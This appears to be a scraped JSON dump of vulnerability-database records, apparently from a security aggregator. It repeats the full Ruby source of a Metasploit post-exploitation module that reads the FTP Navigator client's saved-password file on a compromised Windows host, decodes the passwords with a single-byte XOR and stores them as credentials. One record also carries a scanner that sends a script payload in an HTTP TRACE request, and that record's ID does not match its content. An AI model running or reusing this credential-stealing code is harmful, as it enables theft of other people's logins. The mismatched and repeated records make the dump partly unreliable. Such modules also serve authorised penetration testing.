"https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-21T12:01:03", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-10T17:19:18", "history": [], "viewCount": 21, "enchantments": {"score": {"value": 3.4, "vector": "NONE", "modified": "2019-09-10T17:19:18"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:457DE1A9DA980A8774E2F19F37546F90", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0D174BCF569C95ED0340213A8FBE1815"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DC9E275D88FEAC0E156D75B917F0F299"]}, {"type": "msrc", "idList": ["MSRC:8C76F60768D30CFF6611947EBB044487"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1CDDDB269F7290D32E2124CDF8AA1821"]}, {"type": "thn", "idList": ["THN:4EBD42C3757E080E11C736252B193432", "THN:720C8F7F5211ABA35D5955E6805FFB78"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C5452F2715D49E0A96F0B661BFDF706A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C3F889D9C3C954C42160A3C26034C2F6"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:EBC66FF5446A331ED577606ED40ACD5C"]}, {"type": "exploitdb", "idList": ["EDB-ID:47378", "EDB-ID:47377", "EDB-ID:47372"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704519", "OPENVAS:1361412562310891915", "OPENVAS:1361412562310876785", "OPENVAS:1361412562310844167", "OPENVAS:1361412562310891914", "OPENVAS:1361412562310844169"]}], "modified": "2019-09-10T17:19:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T17:19:18", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-10T21:02:51", "history": [], "viewCount": 21, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2019-09-10T21:02:51"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:983F435DBCB9BF765260D45CBFB7601E", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:27D506234B84C98E28411D4C6C3E0B17", "THREATPOST:457DE1A9DA980A8774E2F19F37546F90", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0D174BCF569C95ED0340213A8FBE1815"]}, {"type": "krebs", "idList": ["KREBS:EAFBD681DCCC92ED5EB0E4EF12586FE5"]}, {"type": "redhat", "idList": ["RHSA-2019:2722"]}, {"type": "thn", "idList": ["THN:F182E505EC977282BAC0B4AE9A1CAA5D", "THN:4EBD42C3757E080E11C736252B193432", "THN:720C8F7F5211ABA35D5955E6805FFB78"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DC9E275D88FEAC0E156D75B917F0F299"]}, {"type": "msrc", "idList": ["MSRC:8C76F60768D30CFF6611947EBB044487"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1CDDDB269F7290D32E2124CDF8AA1821"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C5452F2715D49E0A96F0B661BFDF706A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C3F889D9C3C954C42160A3C26034C2F6"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:EBC66FF5446A331ED577606ED40ACD5C"]}, {"type": "exploitdb", "idList": ["EDB-ID:47378"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891915", "OPENVAS:1361412562310704519"]}], "modified": "2019-09-10T21:02:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T21:02:51", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "42b4d3524402d6e13908603e4f955004", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-11T09:34:46", "history": [], "viewCount": 21, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-11T09:34:46"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47379", "EDB-ID:47380"]}, {"type": "threatpost", "idList": ["THREATPOST:983F435DBCB9BF765260D45CBFB7601E", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:27D506234B84C98E28411D4C6C3E0B17", "THREATPOST:457DE1A9DA980A8774E2F19F37546F90"]}, {"type": "krebs", "idList": ["KREBS:EAFBD681DCCC92ED5EB0E4EF12586FE5"]}, {"type": "redhat", "idList": ["RHSA-2019:2722"]}, {"type": "thn", "idList": ["THN:F182E505EC977282BAC0B4AE9A1CAA5D"]}, {"type": "cve", "idList": ["CVE-2019-11496", "CVE-2019-0365"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DC9E275D88FEAC0E156D75B917F0F299"]}, {"type": "msupdate", "idList": ["MS:F9F3B6FD-0CB1-4691-9B40-E1DBDF038C53", "MS:882CE7F6-7315-4B29-A6BC-AAB171638A50", "MS:757ED247-4E3E-4B8B-91C6-F2B6639E16F7", "MS:3E68494E-FA31-476F-8E1B-59948C3FA8F9", "MS:5787C9BC-DA80-45E5-96BD-8BECBE16040D", "MS:E491AB37-0A95-41B3-9355-B067AF23FC42", "MS:0C8661DD-4D67-404D-8095-B66D854A34F4", "MS:A59837B5-2BC8-460B-8A2C-B4C89590D6DA"]}], "modified": "2019-09-11T09:34:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T09:34:46", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-11T12:31:05", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-11T12:31:05"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:6493BB0B3C7FB2D42FA879E384E697B0", "THREATPOST:983F435DBCB9BF765260D45CBFB7601E", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:27D506234B84C98E28411D4C6C3E0B17", "THREATPOST:457DE1A9DA980A8774E2F19F37546F90"]}, {"type": "securelist", "idList": ["SECURELIST:276C832E454462924159C1E9ADE48E00"]}, {"type": "mskb", "idList": ["KB4484099", "KB4464557", "KB4516033", "KB4516065", "KB4516115"]}, {"type": "exploitdb", "idList": ["EDB-ID:47379", "EDB-ID:47380"]}, {"type": "krebs", "idList": ["KREBS:EAFBD681DCCC92ED5EB0E4EF12586FE5"]}, {"type": "redhat", "idList": ["RHSA-2019:2722"]}, {"type": "thn", "idList": ["THN:F182E505EC977282BAC0B4AE9A1CAA5D"]}, {"type": "cve", "idList": ["CVE-2019-11496", "CVE-2019-0365"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DC9E275D88FEAC0E156D75B917F0F299"]}, {"type": "msupdate", "idList": ["MS:F9F3B6FD-0CB1-4691-9B40-E1DBDF038C53"]}], "modified": "2019-09-11T12:31:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T12:31:05", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 46}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "15f213c6cc18b6c4ce396420ef001fa6", "type": "metasploit", "bulletinFamily": "exploit", "title": "HTTP Cross-Site Tracing Detection", "description": "Checks if the host is vulnerable to Cross-Site Tracing (XST)\n", "published": "2011-11-03T20:09:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3398", "https://www.owasp.org/index.php/Cross_Site_Tracing"], "cvelist": ["CVE-2005-3398"], "lastseen": "2019-09-24T18:13:40", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2019-09-24T18:13:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3398"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310855564", "OPENVAS:1361412562310855212", "OPENVAS:855564", "OPENVAS:855212", "OPENVAS:136141256231011213"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/TRACE", "MSF:AUXILIARY/SCANNER/HTTP/OPTIONS"]}, {"type": "nessus", "idList": ["SOLARIS9_116807.NASL", "SOLARIS9_X86_116808.NASL", "SOLARIS10_121308.NASL", "SOLARIS10_X86_121309.NASL", "HTTP_TRACE.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:877"]}, {"type": "f5", "idList": ["SOL15904"]}], "modified": "2019-09-24T18:13:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/trace.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::WmapScanServer\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP Cross-Site Tracing Detection',\n 'Description' => 'Checks if the host is vulnerable to Cross-Site Tracing (XST)',\n 'Author' =>\n [\n 'Jay Turla <@shipcod3>' , #Cross-Site Tracing (XST) Checker\n 'CG' #HTTP TRACE Detection\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-3398'], # early case where this vector applied to a specific application.\n ['URL', 'https://www.owasp.org/index.php/Cross_Site_Tracing']\n ]\n )\n end\n\n def run_host(target_host)\n\n begin\n res = send_request_raw({\n 'uri' => '/<script>alert(1337)</script>', #XST Payload\n 'method' => 'TRACE',\n })\n\n unless res\n vprint_error(\"#{rhost}:#{rport} did not reply to our request\")\n return\n end\n\n if res.body.to_s.index('/<script>alert(1337)</script>')\n print_good(\"#{rhost}:#{rport} is vulnerable to Cross-Site Tracing\")\n report_vuln(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => (ssl ? 'https' : 'http'),\n :info => \"Vulnerable to Cross-Site Tracing\",\n )\n else\n vprint_error(\"#{rhost}:#{rport} returned #{res.code} #{res.message}\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-24T18:13:40", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 47}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-24T20:08:44", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 1.6, "vector": "NONE", "modified": "2019-09-24T20:08:44"}, "dependencies": {"references": [{"type": "malwarebytes", "idList": ["MALWAREBYTES:0D7561F0D81455A11BCD6FA3159CD2BA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2173-1"]}, {"type": "threatpost", "idList": ["THREATPOST:91920C376E656AE44F244D0A48406DB1", "THREATPOST:514CDACCC8ADB56A9F645D7593358DFE"]}, {"type": "thn", "idList": ["THN:4B606BF31B5FE5BB7C4468D71AF88402", "THN:9C99918B2EAB03E5212BD00D0B8D6967", "THN:AB828E4EB75F9C7BC37B672D9FD0092E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:023807C5DC304CFCD2A9D5345B921793"]}, {"type": "schneier", "idList": ["SCHNEIER:7878751F0724C482FCD78E1B31829DDF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1BD08DC99655350EA575406FAF7A53E5"]}, {"type": "redhat", "idList": ["RHSA-2019:2817"]}, {"type": "exploitdb", "idList": ["EDB-ID:47414", "EDB-ID:47413", "EDB-ID:47411", "EDB-ID:47410"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704529"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154587", "PACKETSTORM:154583", "PACKETSTORM:154581"]}, {"type": "talos", "idList": ["TALOS-2019-0887"]}], "modified": "2019-09-24T20:08:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-24T20:08:44", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-28T19:07:30", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-09-28T19:07:30"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:730987502722793008"]}, {"type": "cve", "idList": ["CVE-2019-11751", "CVE-2019-11736", "CVE-2019-11753"]}, {"type": "threatpost", "idList": ["THREATPOST:FF3E262419A71E9CFD99DBD361F702C3", "THREATPOST:AF55E5030AE22D58CA3861C983339196", "THREATPOST:B66E5C17C21A7D60DA65248831C7BA81", "THREATPOST:437C2783381056627B9A3AA6305FA1A2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4337E0F193BD1CA31D01BEC842EF2E1A", "TALOSBLOG:1BD08DC99655350EA575406FAF7A53E5", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042"]}, {"type": "thn", "idList": ["THN:CC59BB94A402352488E8961780C43965", 